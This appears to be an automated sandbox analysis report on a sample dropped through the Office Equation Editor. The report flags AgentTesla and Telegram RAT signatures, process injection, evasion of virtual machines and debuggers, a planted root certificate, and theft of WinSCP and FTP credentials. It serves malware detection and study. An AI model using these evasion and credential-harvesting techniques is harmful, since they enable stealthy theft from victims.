Source: gudostrp.exe, 00000005.00000002.721799916.00000000001D2000.00000020.00020000.sdmp	String found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/
Source: gufoxqa[1].exe.2.dr	String found in binary or memory: dotNetProtector
Source: gufoxqa[1].exe.2.dr	String found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_001DEB0F push esp; iretd	4_2_001DEF9A
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_001D67F6 pushfd ; iretd	4_2_001D67FB
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_0030DE0D pushfd ; iretd	4_2_0030DE1E
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_0030DB73 push esp; iretd	4_2_0030DB95
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FA5275 push ebx; iretd	4_2_01FA5276
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FB4FE7 push ebx; ret	4_2_01FB501A
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FB504D push ebp; retf	4_2_01FB504E
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FB4FBE push ebx; ret	4_2_01FB501A
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FBA412 pushad ; retf	4_2_01FBA41E
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_01FCB713 pushad ; iretd	4_2_01FCB723
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_02035645 pushad ; ret	4_2_02035655
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_041D561B push eax; retf	4_2_041D5626
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_041D7CC7 push ebx; ret	4_2_041D7CCA
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 4_2_041D5901 pushad ; ret	4_2_041D5902
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_001DEB0F push esp; iretd	5_2_001DEF9A
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_001D67F6 pushfd ; iretd	5_2_001D67FB
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_002530B5 push esp; retf 0012h	5_2_00253105
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_00251B15 push esp; retf 0012h	5_2_00251B69
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Code function: 5_2_0055626C pushfd ; retf 0018h	5_2_0055626D

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\gudostrp.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Stores large binary data to the registry

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 408	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2916	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2364	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2364	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2096	Thread sleep count: 9569 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2096	Thread sleep count: 171 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2364	Thread sleep count: 105 > 30	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Window / User API: threadDelayed 9569

Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Thread delayed: delay time: 30000			Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Code function: 4_2_041DCAE8 CheckRemoteDebuggerPresent,

4_2_041DCAE8

Enables debug privileges

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process token adjusted: Debug			Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Memory written: C:\Users\user\AppData\Roaming\gudostrp.exe base: 400000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Process created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe			Jump to behavior

Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: gudostrp.exe, 00000005.00000002.722211246.0000000000CD0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Queries volume information: C:\Users\user\AppData\Roaming\gudostrp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Queries volume information: C:\Users\user\AppData\Roaming\gudostrp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\gudostrp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Telegram RAT

Source: Yara match	File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 5.2.gudostrp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.31ca110.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.3200330.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.3200330.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.gudostrp.exe.31ca110.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gudostrp.exe PID: 1212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gudostrp.exe PID: 2576, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Roaming\gudostrp.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\gudostrp.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior
